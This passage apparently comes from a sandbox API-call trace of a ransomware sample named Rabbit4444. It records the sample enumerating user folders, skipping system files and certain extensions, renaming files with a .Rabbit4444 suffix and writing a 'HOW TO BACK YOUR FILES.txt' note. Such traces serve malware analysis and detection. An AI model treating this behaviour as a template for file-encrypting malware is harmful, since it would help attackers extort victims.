nNumberOfBytesToWrite=0x52, lpNumberOfBytesWritten=0x130bf8c, lpOverlapped=0x0 | out: lpBuffer=0x130d2c8*, lpNumberOfBytesWritten=0x130bf8c*=0x52, lpOverlapped=0x0) returned 1 [0048.543] CloseHandle (hObject=0x278) returned 1 [0048.544] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0048.545] CloseHandle (hObject=0x0) returned 0 [0048.545] CloseHandle (hObject=0xffffffff) returned 1 [0048.545] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2b71b019, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x2b71b019, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0x2b71b019, ftLastWriteTime.dwHighDateTime=0x1d32722, nFileSizeHigh=0x0, nFileSizeLow=0x357, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="winrt--{S-1-5-21-1051304884-625712362-2192934891-1000}-.searchconnector-ms", cAlternateFileName="WINRT-~1.SEA")) returned 1 [0048.545] lstrcmpiW (lpString1="winrt--{S-1-5-21-1051304884-625712362-2192934891-1000}-.searchconnector-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0048.545] lstrcmpiW (lpString1="winrt--{S-1-5-21-1051304884-625712362-2192934891-1000}-.searchconnector-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0048.545] lstrcmpiW (lpString1="winrt--{S-1-5-21-1051304884-625712362-2192934891-1000}-.searchconnector-ms", lpString2="Rabbit4444.exe") returned 1 [0048.545] lstrcmpiW (lpString1="winrt--{S-1-5-21-1051304884-625712362-2192934891-1000}-.searchconnector-ms", lpString2=".") returned 1 [0048.545] lstrcmpiW (lpString1="winrt--{S-1-5-21-1051304884-625712362-2192934891-1000}-.searchconnector-ms", lpString2="..") returned 1 [0048.545] lstrcmpiW (lpString1="winrt--{S-1-5-21-1051304884-625712362-2192934891-1000}-.searchconnector-ms", lpString2="windows") returned 1 [0048.545] lstrcmpiW (lpString1="winrt--{S-1-5-21-1051304884-625712362-2192934891-1000}-.searchconnector-ms", lpString2="bootmgr") returned 1 [0048.545] lstrcmpiW (lpString1="winrt--{S-1-5-21-1051304884-625712362-2192934891-1000}-.searchconnector-ms", lpString2="pagefile.sys") returned 1 [0048.545] lstrcmpiW (lpString1="winrt--{S-1-5-21-1051304884-625712362-2192934891-1000}-.searchconnector-ms", lpString2="boot") returned 1 [0048.545] lstrcmpiW (lpString1="winrt--{S-1-5-21-1051304884-625712362-2192934891-1000}-.searchconnector-ms", lpString2="ids.txt") returned 1 [0048.545] lstrcmpiW (lpString1="winrt--{S-1-5-21-1051304884-625712362-2192934891-1000}-.searchconnector-ms", lpString2="NTUSER.DAT") returned 1 [0048.545] lstrcpyW (in: lpString1=0x130eb6a, lpString2="winrt--{S-1-5-21-1051304884-625712362-2192934891-1000}-.searchconnector-ms" | out: lpString1="winrt--{S-1-5-21-1051304884-625712362-2192934891-1000}-.searchconnector-ms") returned="winrt--{S-1-5-21-1051304884-625712362-2192934891-1000}-.searchconnector-ms" [0048.545] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Searches\\winrt--{S-1-5-21-1051304884-625712362-2192934891-1000}-.searchconnector-ms", dwFileAttributes=0x0) returned 1 [0048.547] lstrlenW (lpString="winrt--{S-1-5-21-1051304884-625712362-2192934891-1000}-.searchconnector-ms") returned 74 [0048.547] lstrlenW (lpString="Rabbit4444") returned 10 [0048.547] lstrcmpiW (lpString1="nnector-ms", lpString2="Rabbit4444") returned -1 [0048.547] lstrlenW (lpString=".dll") returned 4 [0048.547] lstrcmpiW (lpString1="r-ms", lpString2=".dll") returned 1 [0048.547] lstrlenW (lpString=".lnk") returned 4 [0048.547] lstrcmpiW (lpString1="r-ms", lpString2=".lnk") returned 1 [0048.547] lstrlenW (lpString=".ini") returned 4 [0048.547] lstrcmpiW (lpString1="r-ms", lpString2=".ini") returned 1 [0048.547] lstrlenW (lpString=".sys") returned 4 [0048.547] lstrcmpiW (lpString1="r-ms", lpString2=".sys") returned 1 [0048.547] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Searches\\winrt--{S-1-5-21-1051304884-625712362-2192934891-1000}-.searchconnector-ms" (normalized: "c:\\users\\fd1hvy\\searches\\winrt--{s-1-5-21-1051304884-625712362-2192934891-1000}-.searchconnector-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0048.547] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0048.547] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=13985794710) returned 1 [0048.547] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=855) returned 1 [0048.547] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117608 [0048.547] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101518 [0048.547] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x660, lpName=0x0) returned 0x298 [0048.548] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x660) returned 0x70000 [0048.549] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0048.550] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0048.550] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0048.550] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0048.550] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0048.550] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0048.550] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0048.550] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0048.550] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=13986075257) returned 1 [0048.550] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117608 | out: hHeap=0xe0000) returned 1 [0048.550] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101518 | out: hHeap=0xe0000) returned 1 [0048.550] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0048.550] CloseHandle (hObject=0x298) returned 1 [0048.550] CloseHandle (hObject=0x278) returned 1 [0048.552] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Searches\\winrt--{S-1-5-21-1051304884-625712362-2192934891-1000}-.searchconnector-ms.Rabbit4444") returned 110 [0048.552] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Searches\\winrt--{S-1-5-21-1051304884-625712362-2192934891-1000}-.searchconnector-ms" (normalized: "c:\\users\\fd1hvy\\searches\\winrt--{s-1-5-21-1051304884-625712362-2192934891-1000}-.searchconnector-ms"), lpNewFileName="C:\\Users\\FD1HVy\\Searches\\winrt--{S-1-5-21-1051304884-625712362-2192934891-1000}-.searchconnector-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\searches\\winrt--{s-1-5-21-1051304884-625712362-2192934891-1000}-.searchconnector-ms.rabbit4444"), dwFlags=0x1) returned 1 [0048.552] InterlockedExchangeAdd (in: Addend=0xff618, Value=864 | out: Addend=0xff618) returned 17053904 [0048.552] InterlockedExchangeAdd (in: Addend=0xff624, Value=2 | out: Addend=0xff624) returned 3364 [0048.552] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2b71b019, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x2b71b019, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0x2b71b019, ftLastWriteTime.dwHighDateTime=0x1d32722, nFileSizeHigh=0x0, nFileSizeLow=0x357, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="winrt--{S-1-5-21-1051304884-625712362-2192934891-1000}-.searchconnector-ms", cAlternateFileName="WINRT-~1.SEA")) returned 0 [0048.552] FindClose (in: hFindFile=0x102a90 | out: hFindFile=0x102a90) returned 1 [0048.552] lstrcpyW (in: lpString1=0x130eb6a, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0048.552] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Searches\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\searches\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0048.553] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0048.553] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0048.553] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0048.553] CloseHandle (hObject=0x278) returned 1 [0048.553] CloseHandle (hObject=0x27c) returned 1 [0048.554] GetCurrentThreadId () returned 0xd98 [0048.554] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0xf6670 [0048.554] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\Saved Games", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\Saved Games") returned="C:\\Users\\FD1HVy\\Saved Games" [0048.554] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x102510 | out: hHeap=0xe0000) returned 1 [0048.554] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6668 | out: hHeap=0xe0000) returned 1 [0048.554] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\Saved Games" | out: lpString1="C:\\Users\\FD1HVy\\Saved Games") returned="C:\\Users\\FD1HVy\\Saved Games" [0048.554] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\Saved Games", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\Saved Games\\") returned="C:\\Users\\FD1HVy\\Saved Games\\" [0048.554] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\Saved Games\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\Saved Games\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\Saved Games\\.BFC0E91B00AE8A0620D3" [0048.554] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Saved Games\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\saved games\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0048.555] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0048.557] FlushFileBuffers (hFile=0x27c) returned 1 [0048.558] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Saved Games\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0048.559] CloseHandle (hObject=0x27c) returned 1 [0048.559] lstrlenW (lpString="C:\\Users\\FD1HVy\\Saved Games") returned 27 [0048.559] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0048.559] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Saved Games\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd45b644a, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xe6434a4b, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102950 [0048.559] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0048.560] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0048.560] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0048.560] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0048.560] FindNextFileW (in: hFindFile=0x102950, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd45b644a, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xe6434a4b, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0048.560] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0048.560] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0048.560] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0048.560] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0048.560] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0048.560] FindNextFileW (in: hFindFile=0x102950, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe6434a4b, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe6434a4b, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe6434a4b, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0048.560] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0048.560] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0048.560] FindNextFileW (in: hFindFile=0x102950, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x441f699e, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x441f699e, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0xce4e13d2, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0048.560] lstrcmpiW (lpString1="desktop.ini", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0048.560] lstrcmpiW (lpString1="desktop.ini", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0048.560] lstrcmpiW (lpString1="desktop.ini", lpString2="Rabbit4444.exe") returned -1 [0048.560] lstrcmpiW (lpString1="desktop.ini", lpString2=".") returned 1 [0048.560] lstrcmpiW (lpString1="desktop.ini", lpString2="..") returned 1 [0048.560] lstrcmpiW (lpString1="desktop.ini", lpString2="windows") returned -1 [0048.560] lstrcmpiW (lpString1="desktop.ini", lpString2="bootmgr") returned 1 [0048.560] lstrcmpiW (lpString1="desktop.ini", lpString2="pagefile.sys") returned -1 [0048.560] lstrcmpiW (lpString1="desktop.ini", lpString2="boot") returned 1 [0048.560] lstrcmpiW (lpString1="desktop.ini", lpString2="ids.txt") returned -1 [0048.560] lstrcmpiW (lpString1="desktop.ini", lpString2="NTUSER.DAT") returned -1 [0048.560] lstrcpyW (in: lpString1=0x130eb70, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0048.561] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Saved Games\\desktop.ini", dwFileAttributes=0x22) returned 1 [0048.561] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Saved Games\\desktop.ini", dwFileAttributes=0x6) returned 1 [0048.561] lstrlenW (lpString="desktop.ini") returned 11 [0048.561] lstrlenW (lpString="Rabbit4444") returned 10 [0048.561] lstrcmpiW (lpString1="esktop.ini", lpString2="Rabbit4444") returned -1 [0048.561] lstrlenW (lpString=".dll") returned 4 [0048.561] lstrcmpiW (lpString1=".ini", lpString2=".dll") returned 1 [0048.561] lstrlenW (lpString=".lnk") returned 4 [0048.561] lstrcmpiW (lpString1=".ini", lpString2=".lnk") returned -1 [0048.561] lstrlenW (lpString=".ini") returned 4 [0048.561] lstrcmpiW (lpString1=".ini", lpString2=".ini") returned 0 [0048.561] FindNextFileW (in: hFindFile=0x102950, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x441f699e, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x441f699e, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0xce4e13d2, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0048.561] FindClose (in: hFindFile=0x102950 | out: hFindFile=0x102950) returned 1 [0048.561] lstrcpyW (in: lpString1=0x130eb70, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0048.561] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Saved Games\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\saved games\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0048.563] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0048.563] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0048.564] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0048.564] CloseHandle (hObject=0x278) returned 1 [0048.564] CloseHandle (hObject=0x27c) returned 1 [0048.564] GetCurrentThreadId () returned 0xd98 [0048.564] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0xf63b0 [0048.565] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\Pictures", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\Pictures") returned="C:\\Users\\FD1HVy\\Pictures" [0048.565] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x102990 | out: hHeap=0xe0000) returned 1 [0048.565] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf63a8 | out: hHeap=0xe0000) returned 1 [0048.565] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\Pictures" | out: lpString1="C:\\Users\\FD1HVy\\Pictures") returned="C:\\Users\\FD1HVy\\Pictures" [0048.565] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\Pictures", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\Pictures\\") returned="C:\\Users\\FD1HVy\\Pictures\\" [0048.565] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\Pictures\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\Pictures\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\Pictures\\.BFC0E91B00AE8A0620D3" [0048.565] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\pictures\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0048.566] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0048.568] FlushFileBuffers (hFile=0x27c) returned 1 [0048.576] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0048.576] CloseHandle (hObject=0x27c) returned 1 [0048.577] lstrlenW (lpString="C:\\Users\\FD1HVy\\Pictures") returned 24 [0048.577] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0048.577] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xcd4ccbd8, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe645ad28, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1025d0 [0048.577] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0048.577] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0048.577] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0048.577] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0048.577] FindNextFileW (in: hFindFile=0x1025d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xcd4ccbd8, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe645ad28, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0048.577] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0048.577] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0048.577] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0048.577] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0048.577] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0048.577] FindNextFileW (in: hFindFile=0x1025d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe645ad28, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe645ad28, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe645ad28, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0048.577] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0048.577] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0048.577] FindNextFileW (in: hFindFile=0x1025d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb58ac40, ftCreationTime.dwHighDateTime=0x1d4d4a5, ftLastAccessTime.dwLowDateTime=0x936ad5a0, ftLastAccessTime.dwHighDateTime=0x1d4d571, ftLastWriteTime.dwLowDateTime=0x936ad5a0, ftLastWriteTime.dwHighDateTime=0x1d4d571, nFileSizeHigh=0x0, nFileSizeLow=0xb151, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="0E0w6TbFOV.gif", cAlternateFileName="0E0W6T~1.GIF")) returned 1 [0048.577] lstrcmpiW (lpString1="0E0w6TbFOV.gif", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0048.577] lstrcmpiW (lpString1="0E0w6TbFOV.gif", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0048.577] lstrcmpiW (lpString1="0E0w6TbFOV.gif", lpString2="Rabbit4444.exe") returned -1 [0048.577] lstrcmpiW (lpString1="0E0w6TbFOV.gif", lpString2=".") returned 1 [0048.577] lstrcmpiW (lpString1="0E0w6TbFOV.gif", lpString2="..") returned 1 [0048.578] lstrcmpiW (lpString1="0E0w6TbFOV.gif", lpString2="windows") returned -1 [0048.578] lstrcmpiW (lpString1="0E0w6TbFOV.gif", lpString2="bootmgr") returned -1 [0048.578] lstrcmpiW (lpString1="0E0w6TbFOV.gif", lpString2="pagefile.sys") returned -1 [0048.578] lstrcmpiW (lpString1="0E0w6TbFOV.gif", lpString2="boot") returned -1 [0048.578] lstrcmpiW (lpString1="0E0w6TbFOV.gif", lpString2="ids.txt") returned -1 [0048.578] lstrcmpiW (lpString1="0E0w6TbFOV.gif", lpString2="NTUSER.DAT") returned -1 [0048.578] lstrcpyW (in: lpString1=0x130eb6a, lpString2="0E0w6TbFOV.gif" | out: lpString1="0E0w6TbFOV.gif") returned="0E0w6TbFOV.gif" [0048.578] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\0E0w6TbFOV.gif", dwFileAttributes=0x0) returned 1 [0048.578] lstrlenW (lpString="0E0w6TbFOV.gif") returned 14 [0048.578] lstrlenW (lpString="Rabbit4444") returned 10 [0048.578] lstrcmpiW (lpString1="6TbFOV.gif", lpString2="Rabbit4444") returned -1 [0048.578] lstrlenW (lpString=".dll") returned 4 [0048.578] lstrcmpiW (lpString1=".gif", lpString2=".dll") returned 1 [0048.578] lstrlenW (lpString=".lnk") returned 4 [0048.578] lstrcmpiW (lpString1=".gif", lpString2=".lnk") returned -1 [0048.578] lstrlenW (lpString=".ini") returned 4 [0048.578] lstrcmpiW (lpString1=".gif", lpString2=".ini") returned -1 [0048.578] lstrlenW (lpString=".sys") returned 4 [0048.578] lstrcmpiW (lpString1=".gif", lpString2=".sys") returned -1 [0048.578] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\0E0w6TbFOV.gif" (normalized: "c:\\users\\fd1hvy\\pictures\\0e0w6tbfov.gif"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0048.578] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0048.578] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=13988916331) returned 1 [0048.578] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=45393) returned 1 [0048.579] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1178d8 [0048.579] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101518 [0048.579] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, 